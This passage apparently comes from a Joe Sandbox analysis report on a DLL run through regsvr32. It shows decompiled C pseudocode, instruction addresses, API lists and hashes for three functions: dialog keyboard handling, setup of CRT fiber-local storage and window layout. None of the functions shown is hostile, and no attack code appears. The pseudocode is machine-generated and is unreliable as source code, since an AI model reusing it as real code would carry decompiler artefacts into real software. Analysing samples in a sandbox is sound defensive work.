									_t148 = E1000FBEB( *(_t210 + 8));
								} else {
									_t202 =  *(_t210 - 0x14);
									_t185 = _t202;
									_t148 = E10020354(_t202);
								}
								_t197 = 0;
								__eflags = _t202;
								 *((intOrPtr*)(_t210 - 0x20)) = _t148;
								if(_t202 != 0) {
									L76:
									_t185 = _t202;
									_t149 = E100203CE(_t202);
									__eflags = _t149;
									if(_t149 != 0) {
										__eflags =  *((intOrPtr*)(_t202 + 0x4c)) - _t197;
										if( *((intOrPtr*)(_t202 + 0x4c)) == _t197) {
											goto L47;
										}
										_push(_t197);
										_push(_t197);
										_push(_t197);
										_push(1);
										_push(0xfffffdd9);
										_push(_t202);
										 *(_t210 - 4) = _t197;
										E1002042B();
										 *(_t210 - 4) =  *(_t210 - 4) | 0xffffffff;
										goto L90;
									}
									MessageBeep(_t197);
									goto L47;
								} else {
									L75:
									_t202 = E1000FAE5( *(_t210 + 8),  *((intOrPtr*)(_t210 - 0x20)));
									__eflags = _t202 - _t197;
									if(_t202 == _t197) {
										goto L47;
									}
									goto L76;
								}
							}
							if(__eflags == 0) {
								L74:
								_t197 = 0;
								__eflags = 0;
								goto L75;
							}
							__eflags = _t185 - 3;
							if(_t185 == 3) {
								goto L74;
							}
							__eflags = _t185 - 9;
							if(_t185 == 9) {
								__eflags = _t119 & 0x00000002;
								if((_t119 & 0x00000002) != 0) {
									goto L47;
								}
								_t153 = GetKeyState(0x10);
								_t207 =  *(_t210 + 8);
								__eflags = _t153;
								_t180 = 0 | _t153 < 0x00000000;
								_t185 = _t207;
								_t154 = E1002057B(_t207, 0, _t153 < 0);
								__eflags = _t154;
								if(_t154 == 0) {
									goto L47;
								}
								__eflags =  *(_t154 + 4);
								if( *(_t154 + 4) == 0) {
									_t155 =  *_t154;
									__eflags = _t155;
									if(_t155 == 0) {
										_t185 = _t207;
										_t156 = E10006C66(_t207,  *((intOrPtr*)(_t210 - 0x1c)), _t180);
									} else {
										_t156 = E100220EE(_t210, _t155);
									}
									_t198 = _t156;
									__eflags = _t198;
									if(_t198 != 0) {
										 *( *((intOrPtr*)(_t207 + 0x48)) + 0x6c) =  *( *((intOrPtr*)(_t207 + 0x48)) + 0x6c) & 0x00000000;
										E1000F667(_t198);
										E1000FA6A(_t185, _t210,  *(_t210 - 0x14), _t198);
										_pop(_t185);
									}
								} else {
									_t160 =  *(_t154 + 4);
									_t185 = _t160;
									 *((intOrPtr*)( *_t160 + 0xac))(_t192);
								}
								goto L90;
							}
							__eflags = _t185 - 0xd;
							if(_t185 == 0xd) {
								goto L68;
							}
							goto L47;
						}
						_t163 = _t118;
						__eflags = _t163;
						if(_t163 == 0) {
							L33:
							_t164 = E1000F57E( *((intOrPtr*)(_t210 - 0x1c)), _t192);
							__eflags =  *(_t210 - 0x18) - 0x102;
							if( *(_t210 - 0x18) != 0x102) {
								L35:
								_t185 = _t192->wParam;
								__eflags = _t185 - 9;
								if(_t185 != 9) {
									L37:
									__eflags = _t185 - 0x20;
									if(__eflags != 0) {
										_t165 = E1000F922(_t180, _t185, __eflags,  *(_t210 + 8),  *((intOrPtr*)(_t210 - 0x1c)), _t192);
										__eflags = _t165;
										if(_t165 == 0) {
											goto L47;
										}
										_t166 =  *(_t165 + 4);
										__eflags = _t166;
										if(_t166 == 0) {
											goto L47;
										} else {
											_t185 = _t166;
											E1000A71A(_t166, _t192);
											goto L90;
										}
									}
									goto L38;
								}
								__eflags = _t164 & 0x00000002;
								if((_t164 & 0x00000002) != 0) {
									goto L47;
								}
								goto L37;
							}
							__eflags = _t164 & 0x00000084;
							if((_t164 & 0x00000084) != 0) {
								goto L47;
							}
							goto L35;
						}
						__eflags = _t163 != 4;
						if(_t163 != 4) {
							goto L47;
						}
						__eflags =  *(_t210 - 0x14);
						if( *(_t210 - 0x14) != 0) {
							L32:
							__eflags = _t192->wParam - 0x20;
							if(_t192->wParam == 0x20) {
								goto L47;
							}
							goto L33;
						}
						_t169 = GetKeyState(0x12);
						__eflags = _t169;
						if(_t169 >= 0) {
							goto L47;
						}
						goto L32;
					} else {
						_t208 =  *(_t210 - 0x14);
						while( *(_t208 + 0x4c) == 0 && E100220EE(_t210, GetParent( *(_t208 + 0x1c))) !=  *(_t210 + 8)) {
							_t208 = E100220EE(_t210, GetParent( *(_t208 + 0x1c)));
							if(_t208 != 0) {
								continue;
							}
							break;
						}
						if(_t208 == 0) {
							L17:
							__eflags =  *(_t210 - 0x18) - 0x101;
							if( *(_t210 - 0x18) == 0x101) {
								L20:
								__eflags = _t208;
								if(_t208 == 0) {
									L26:
									_t192 =  *(_t210 + 0xc);
									goto L27;
								}
								_t209 =  *(_t208 + 0x4c);
								__eflags = _t209;
								if(_t209 == 0) {
									goto L26;
								}
								_t171 =  *(_t210 + 0xc)->wParam;
								__eflags = _t171 - 0xd;
								if(_t171 != 0xd) {
									L24:
									__eflags = _t171 - 0x1b;
									if(_t171 != 0x1b) {
										goto L26;
									}
									__eflags =  *(_t209 + 0x80) & 0x00000002;
									if(( *(_t209 + 0x80) & 0x00000002) != 0) {
										L38:
										_t123 = 0;
										L54:
										 *[fs:0x0] =  *((intOrPtr*)(_t210 - 0xc));
										return _t123;
									}
									goto L26;
								}
								__eflags =  *(_t209 + 0x80) & 0x00000001;
								if(( *(_t209 + 0x80) & 0x00000001) != 0) {
									goto L38;
								}
								goto L24;
							}
							__eflags =  *(_t210 - 0x18) - _t180;
							if( *(_t210 - 0x18) == _t180) {
								goto L20;
							}
							__eflags =  *(_t210 - 0x18) - 0x102;
							if( *(_t210 - 0x18) != 0x102) {
								goto L26;
							}
							goto L20;
						}
						_t172 =  *(_t208 + 0x4c);
						if(_t172 == 0 ||  *(_t172 + 0x54) == 0) {
							goto L17;
						} else {
							_t173 =  *(_t172 + 0x54);
							_t185 =  *_t173;
							_t174 =  *((intOrPtr*)( *_t173 + 0x14))(_t173,  *(_t210 + 0xc));
							if(_t174 != 0) {
								goto L17;
							} else {
								_t123 = _t174 + 1;
								goto L54;
							}
						}
					}
				}
			}

0x1000fcf8
0x1000fcfd
0x1000fd05
0x1000fd0d
0x1000fd10
0x1000fd1a
0x1000fd12
0x1000fd12
0x1000fd12
0x1000fd1d
0x1000fd20
0x1000fd23
0x1000fd2d
0x1000fd30
0x1000fd35
0x1000fd3c
0x1000fd3f
0x1000fd4f
0x00000000
0x00000000
0x00000000
0x00000000
0x1000fd61
0x1000fd61
0x1000fd63
0x1000fe0e
0x1000fe15
0x1000fe1b
0x1000fe1d
0x1000fe20
0x1000fe20
0x1000fe22
0x1000fe29
0x1000feb6
0x1000febb
0x1000febf
0x1000fec2
0x1000fffe
0x10010001
0x1000fee9
0x1000fef8
0x1000fefa
0x1000fefc
0x1000ff07
0x1000ff0c
0x1000ff0f
0x1000ff1a
0x1000ff1f
0x1000ff1f
0x1000ff0f
0x1000ff20
0x1000ff29
0x1000ff2b
0x1000ff2d
0x1000ff41
0x1000ff47
0x1000ff4b
0x1000ff4d
0x1000ff4f
0x1000ff60
0x1000ff60
0x1000ff4f
0x1000ff65
0x00000000
0x1000ff65
0x10010007
0x1001000a
0x100100b7
0x100100be
0x100100c2
0x100100c7
0x100100c9
0x00000000
0x00000000
0x100100cf
0x100100d3
0x100100d6
0x100100d8
0x100100e1
0x100100da
0x100100da
0x100100da
0x100100e6
0x100100e8
0x100100ea
0x00000000
0x100100f0
0x100100f0
0x100100f4
0x100100f6
0x100100fa
0x100100fa
0x100100ff
0x10010103
0x10010119
0x1001011b
0x1001011d
0x1001012a
0x10010130
0x1001011f
0x10010120
0x10010120
0x10010135
0x10010137
0x10010139
0x00000000
0x1001013f
0x10010148
0x1001014b
0x10010150
0x10010153
0x10010160
0x10010160
0x00000000
0x10010153
0x10010105
0x10010105
0x1001010b
0x10010111
0x10010113
0x00000000
0x10010113
0x10010103
0x100100ea
0x10010010
0x10010013
0x00000000
0x00000000
0x10010019
0x1001001c
0x00000000
0x00000000
0x10010022
0x10010022
0x10010024
0x00000000
0x00000000
0x1001002d
0x10010032
0x10010034
0x10010035
0x10010046
0x10010037
0x10010037
0x1001003a
0x1001003c
0x1001003c
0x1001004b
0x1001004d
0x1001004f
0x10010052
0x1001006d
0x1001006d
0x1001006f
0x10010074
0x10010076
0x10010084
0x10010087
0x00000000
0x00000000
0x1001008d
0x1001008e
0x1001008f
0x10010090
0x10010092
0x10010097
0x10010098
0x1001009b
0x100100a3
0x00000000
0x100100a3
0x10010079
0x00000000
0x10010054
0x10010058
0x10010063
0x10010065
0x10010067
0x00000000
0x00000000
0x00000000
0x10010067
0x10010052
0x1000fec8
0x10010056
0x10010056
0x10010056
0x00000000
0x10010056
0x1000fece
0x1000fed1
0x00000000
0x00000000
0x1000fed7
0x1000feda
0x1000ff78
0x1000ff7a
0x00000000
0x00000000
0x1000ff82
0x1000ff88
0x1000ff8d
0x1000ff90
0x1000ff93
0x1000ff98
0x1000ff9d
0x1000ff9f
0x00000000
0x00000000
0x1000ffa5
0x1000ffa9
0x1000ffbe
0x1000ffc0
0x1000ffc2
0x1000ffd0
0x1000ffd2
0x1000ffc4
0x1000ffc5
0x1000ffc5
0x1000ffd7
0x1000ffd9
0x1000ffdb
0x1000ffe4
0x1000ffe9
0x1000fff2
0x1000fff8
0x1000fff8
0x1000ffab
0x1000ffab
0x1000ffb1
0x1000ffb3
0x1000ffb3
0x00000000
0x1000ffa9
0x1000fee0
0x1000fee3
0x00000000
0x00000000
0x00000000
0x1000fee3
0x1000fe30
0x1000fe30
0x1000fe31
0x1000fe5d
0x1000fe61
0x1000fe66
0x1000fe6d
0x1000fe73
0x1000fe73
0x1000fe77
0x1000fe7b
0x1000fe81
0x1000fe81
0x1000fe85
0x1000fe95
0x1000fe9a
0x1000fe9c
0x00000000
0x00000000
0x1000fe9e
0x1000fea1
0x1000fea3
0x00000000
0x1000fea5
0x1000fea6
0x1000fea8
0x00000000
0x1000fea8
0x1000fea3
0x00000000
0x1000fe85
0x1000fe7d
0x1000fe7f
0x00000000
0x00000000
0x00000000
0x1000fe7f
0x1000fe6f
0x1000fe71
0x00000000
0x00000000
0x00000000
0x1000fe71
0x1000fe33
0x1000fe36
0x00000000
0x00000000
0x1000fe3c
0x1000fe3f
0x1000fe52
0x1000fe52
0x1000fe57
0x00000000
0x00000000
0x00000000
0x1000fe57
0x1000fe43
0x1000fe49
0x1000fe4c
0x00000000
0x00000000
0x00000000
0x1000fd69
0x1000fd69
0x1000fd72
0x1000fd93
0x1000fd97
0x00000000
0x00000000
0x00000000
0x1000fd97
0x1000fd9b
0x1000fdc0
0x1000fdc0
0x1000fdc7
0x1000fdd7
0x1000fdd7
0x1000fdd9
0x1000fe0b
0x1000fe0b
0x00000000
0x1000fe0b
0x1000fddb
0x1000fdde
0x1000fde0
0x00000000
0x00000000
0x1000fde5
0x1000fde9
0x1000fded
0x1000fdfc
0x1000fdfc
0x1000fe00
0x00000000
0x00000000
0x1000fe02
0x1000fe09
0x1000fe87
0x1000fe87
0x1000ff67
0x1000ff6c
0x1000ff75
0x1000ff75
0x00000000
0x1000fe09
0x1000fdef
0x1000fdf6
0x00000000
0x00000000
0x00000000
0x1000fdf6
0x1000fdc9
0x1000fdcc
0x00000000
0x00000000
0x1000fdce
0x1000fdd5
0x00000000
0x00000000
0x00000000
0x1000fdd5
0x1000fd9d
0x1000fda2
0x00000000
0x1000fdaa
0x1000fdaa
0x1000fdb0
0x1000fdb3
0x1000fdb8
0x00000000
0x1000fdba
0x1000fdba
0x00000000
0x1000fdba
0x1000fdb8
0x1000fda2
0x1000fd63

APIs

__EH_prolog.LIBCMT ref: 1000FCFD
GetFocus.USER32 ref: 1000FD26
GetParent.USER32(?), ref: 1000FD7B
GetParent.USER32(?), ref: 1000FD8B
GetKeyState.USER32 ref: 1000FE43
IsDialogMessageA.USER32(?,?,?,?,?,00000000), ref: 1000FEF2
GetFocus.USER32 ref: 1000FF04
GetFocus.USER32 ref: 1000FF11

Part of subcall function 10006C66: GetNextDlgTabItem.USER32(?,?,?), ref: 10006C79

IsWindow.USER32(?), ref: 1000FF29
GetFocus.USER32 ref: 1000FF35
IsWindow.USER32(?), ref: 1000FF4B
GetFocus.USER32 ref: 1000FF51
GetKeyState.USER32 ref: 1000FF82
MessageBeep.USER32(00000000), ref: 10010079
SendMessageA.USER32 ref: 10010160

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
String ID:
API String ID: 2999224188-0
Opcode ID: fb21a70da8b2322adeae24ed3c2c6993691ff0b11f238f5cd034cdf1d19b064f
Instruction ID: 21539f8b15833155cbabaeec37cc23cdda9b79cec711f9471128e86a6a6d016e
Opcode Fuzzy Hash: fb21a70da8b2322adeae24ed3c2c6993691ff0b11f238f5cd034cdf1d19b064f
Instruction Fuzzy Hash: DFC1D33590024AAFEB21DB61C845ABE7BF5EF443D0F11402EF841AB566CB75EC80EB91

Uniqueness

Uniqueness Score: -1.00%

Function 10015384 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10015384() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E100138E5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1004f5e0;
						 *0x1004f5e8 = _t16;
						if( *0x1004f5e0 == 0) {
							 *0x1004f5e0 = TlsGetValue;
							 *0x1004f5e4 = TlsSetValue;
							 *0x1004f5dc = 0x10015164;
							 *0x1004f5e8 = TlsFree;
						}
					}
					_t7 =  *0x1004f5dc(E1001520E);
					__eflags = _t7 - 0xffffffff;
					 *0x1004c848 = _t7;
					if(__eflags == 0) {
						L9:
						E1001516D();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E1001382A(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E1001516D();
					return 0;
				}
			}

0x1001538b
0x10015395
0x100153a2
0x100153a4
0x100153a6
0x100153a8
0x100153bc
0x100153c9
0x100153d6
0x100153db
0x100153dd
0x100153e4
0x100153e9
0x100153f0
0x100153fa
0x10015404
0x1001540e
0x1001540e
0x100153e9
0x10015418
0x1001541e
0x10015421
0x10015426
0x10015469
0x10015469
0x1001546e
0x1001546e
0x10015428
0x1001542a
0x10015430
0x10015436
0x10015438
0x1001543c
0x00000000
0x1001543e
0x10015445
0x1001544b
0x1001544d
0x00000000
0x1001544f
0x1001544f
0x10015456
0x10015459
0x1001545f
0x10015463
0x10015465
0x10015465
0x1001544d
0x1001543c
0x10015472
0x1001538d
0x1001538d
0x10015394
0x10015394

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
GetCurrentThreadId.KERNEL32 ref: 10015459

Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178

Strings

FlsSetValue, xrefs: 100153C3
FlsAlloc, xrefs: 100153AE
kernel32.dll, xrefs: 10015397
FlsFree, xrefs: 100153D0
FlsGetValue, xrefs: 100153B6

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
API String ID: 2355849793-282957996
Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1002D2D6 Relevance: 21.4, APIs: 14, Instructions: 397
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				void* _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				struct tagRECT _v100;
				struct HDWP__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t188;
				signed int _t190;
				signed int _t192;
				intOrPtr* _t198;
				intOrPtr _t206;
				int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				signed int _t221;
				void* _t225;
				intOrPtr _t233;
				intOrPtr _t234;
				int _t243;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t273;
				signed int _t280;
				signed int _t287;
				intOrPtr* _t297;
				intOrPtr _t302;
				signed int _t310;
				signed int _t312;
				intOrPtr _t319;
				signed int _t325;
				intOrPtr _t326;
				signed int _t329;
				int _t334;
				intOrPtr* _t341;

				_t297 = __ecx;
				E1002F49A( &_v28, _a8, _a12);
				if(IsRectEmpty(_t297 + 0xac) != 0) {
					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
					_t188 = _v84.right - _v84.left;
					_t302 = _v84.bottom - _v84.top;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
					_t188 = _v68.right - _v68.left;
					_t302 = _v68.bottom - _v68.top;
				}
				_t334 = 0;
				_v44 = _t188;
				_v40 = _t302;
				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
				} else {
					_v132 = 0;
				}
				_t190 =  *0x1004efa0; // 0x2
				_v36 =  ~_t190;
				_t192 =  *0x1004efa4; // 0x2
				_v32 =  ~_t192;
				_v16 = _t334;
				_v12 = _t334;
				_v8 = _t334;
				if( *(_t297 + 0x9c) <= _t334) {
					L72:
					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
						EndDeferWindowPos(_v132);
					}
					SetRectEmpty( &_v100);
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
					if(_a8 == _t334 || _a12 == _t334) {
						if(_v28 != _t334) {
							_v28 = _v28 + _v100.left - _v100.right;
						}
					}
					if(_a8 == _t334 || _a12 != _t334) {
						if(_v24 != _t334) {
							_v24 = _v24 + _v100.top - _v100.bottom;
						}
					}
					_t198 = _a4;
					 *_t198 = _v28;
					 *((intOrPtr*)(_t198 + 4)) = _v24;
					return _t198;
				} else {
					do {
						_t341 = E1002CE0B(_t297, _v8);
						_v20 = _t341;
						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
						if(_t341 == _t334) {
							if(_t206 != _t334) {
								goto L71;
							}
							L58:
							_t208 = _v16;
							if(_t208 != _t334) {
								if(_a12 == _t334) {
									_t310 = _v36 + _t208 -  *0x1004efa0;
									_v36 = _t310;
									if(_v28 <= _t310) {
										_v28 = _t310;
									}
									_t210 = _v32;
									if(_v24 <= _t210) {
										_v24 = _t210;
									}
									_t211 =  *0x1004efa4; // 0x2
									_v32 =  ~_t211;
								} else {
									_t312 = _v32 + _t208 -  *0x1004efa4;
									_t214 = _v36;
									_v32 = _t312;
									if(_v28 <= _t214) {
										_v28 = _t214;
									}
									if(_v24 <= _t312) {
										_v24 = _t312;
									}
									_t215 =  *0x1004efa0; // 0x2
									_v36 =  ~_t215;
								}
								_v16 = _t334;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
							L51:
							if(_v12 != _t334) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
							goto L71;
						}
						_t221 =  *(_t341 + 0x7c);
						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
						} else {
							_t225 = 6;
						}
						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
						E100086B2( &_v68, _v36, _v32, _v52, _v48);
						GetWindowRect( *(_t341 + 0x1c),  &_v84);
						E10028E5A(_t297,  &_v84);
						if(_a12 == _t334) {
							_t233 = _v84.top;
							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t334, _t233 - _v68.top);
							}
							_t234 = _v68.bottom;
							_t319 = _v40;
							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
								_t256 = _v32;
								if(_t325 > _t256) {
									_t256 = _t325;
								}
								OffsetRect( &_v68, _t334, _t256 - _v68.top);
							}
							if(_v12 == _t334) {
								if(_v68.top < _v40 -  *0x1004efa4) {
									goto L44;
								}
								_t247 = _v8;
								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x1004efa4; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
								L44:
								if(EqualRect( &_v68,  &_v84) == 0) {
									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t341 = _v20;
										_t334 = 0;
									}
									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
								}
								_v32 = _v68.top -  *0x1004efa4 + _v48;
								_t243 = _v52;
								if(_v16 > _t243) {
									goto L52;
								} else {
									_v16 = _t243;
									goto L51;
								}
							}
						} else {
							_t263 = _v84.left;
							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t263 - _v68.left, _t334);
							}
							_t264 = _v68.right;
							_t326 = _v44;
							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
								L22:
								if(_v12 == _t334) {
									if(_v68.left < _v44 -  *0x1004efa0) {
										L27:
										if(EqualRect( &_v68,  &_v84) == 0) {
											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t341 = _v20;
												_t334 = 0;
											}
											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
										}
										_v36 = _v52 -  *0x1004efa0 + _v68.left;
										_t273 = _v48;
										if(_v16 <= _t273) {
											_v16 = _t273;
										}
										goto L52;
									}
									_t277 = _v8;
									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
										goto L27;
									} else {
										L56:
										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
										_v12 = 1;
										goto L58;
									}
								}
								_t280 =  *0x1004efa0; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
								goto L27;
							} else {
								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
								_t287 = _v36;
								if(_t329 > _t287) {
									_t287 = _t329;
								}
								OffsetRect( &_v68, _t287 - _v68.left, _t334);
								goto L22;
							}
						}
						L71:
						_v8 = _v8 + 1;
					} while (_v8 <  *(_t297 + 0x9c));
					goto L72;
				}
			}

0x1002d2eb
0x1002d2ee
0x1002d302
0x1002d338
0x1002d344
0x1002d347
0x1002d304
0x1002d30c
0x1002d30d
0x1002d30e
0x1002d315
0x1002d316
0x1002d322
0x1002d325
0x1002d325
0x1002d34a
0x1002d352
0x1002d355
0x1002d358
0x1002d36b
0x1002d35a
0x1002d35a
0x1002d35a
0x1002d36e
0x1002d375
0x1002d378
0x1002d385
0x1002d388
0x1002d38b
0x1002d38e
0x1002d391
0x1002d6fd
0x1002d703
0x1002d70d
0x1002d70d
0x1002d717
0x1002d728
0x1002d731
0x1002d73b
0x1002d743
0x1002d743
0x1002d73b
0x1002d749
0x1002d753
0x1002d75b
0x1002d75b
0x1002d753
0x1002d75e
0x1002d765
0x1002d76b
0x1002d770
0x1002d397
0x1002d397
0x1002d3a4
0x1002d3ac
0x1002d3b6
0x1002d3b8
0x1002d682
0x00000000
0x00000000
0x1002d684
0x1002d684
0x1002d689
0x1002d68e
0x1002d6c6
0x1002d6cb
0x1002d6ce
0x1002d6d0
0x1002d6d0
0x1002d6d3
0x1002d6d9
0x1002d6db
0x1002d6db
0x1002d6de
0x1002d6e5
0x1002d690
0x1002d699
0x1002d69b
0x1002d6a1
0x1002d6a4
0x1002d6a6
0x1002d6a6
0x1002d6ac
0x1002d6ae
0x1002d6ae
0x1002d6b1
0x1002d6b8
0x1002d6b8
0x1002d6e8
0x1002d6e8
0x00000000
0x1002d689
0x1002d3ca
0x1002d61a
0x1002d61d
0x00000000
0x00000000
0x1002d623
0x1002d62b
0x00000000
0x1002d62b
0x1002d3d0
0x1002d3d5
0x1002d3e7
0x1002d3ec
0x1002d3db
0x1002d3dd
0x1002d3dd
0x1002d3fa
0x1002d40f
0x1002d41b
0x1002d427
0x1002d42f
0x1002d540
0x1002d546
0x1002d559
0x1002d559
0x1002d55f
0x1002d562
0x1002d567
0x1002d57a
0x1002d57c
0x1002d581
0x1002d583
0x1002d583
0x1002d58e
0x1002d58e
0x1002d597
0x1002d642
0x00000000
0x00000000
0x1002d648
0x1002d64d
0x00000000
0x00000000
0x00000000
0x00000000
0x1002d59d
0x1002d59d
0x1002d5af
0x1002d5b2
0x1002d5b8
0x1002d5c8
0x1002d5d0
0x1002d5e7
0x1002d5e8
0x1002d5e9
0x1002d5ea
0x1002d5eb
0x1002d5ee
0x1002d5ee
0x1002d5fb
0x1002d5fb
0x1002d60c
0x1002d60f
0x1002d615
0x00000000
0x1002d617
0x1002d617
0x00000000
0x1002d617
0x1002d615
0x1002d435
0x1002d435
0x1002d43b
0x1002d44e
0x1002d44e
0x1002d454
0x1002d457
0x1002d45c
0x1002d489
0x1002d48c
0x1002d4b7
0x1002d4d5
0x1002d4e5
0x1002d4ed
0x1002d504
0x1002d505
0x1002d506
0x1002d507
0x1002d508
0x1002d50b
0x1002d50b
0x1002d518
0x1002d518
0x1002d529
0x1002d52c
0x1002d532
0x1002d538
0x1002d538
0x00000000
0x1002d532
0x1002d4b9
0x1002d4be
0x00000000
0x1002d668
0x1002d668
0x1002d676
0x1002d67b
0x00000000
0x1002d67b
0x1002d4be
0x1002d48e
0x1002d4a0
0x1002d4a3
0x00000000
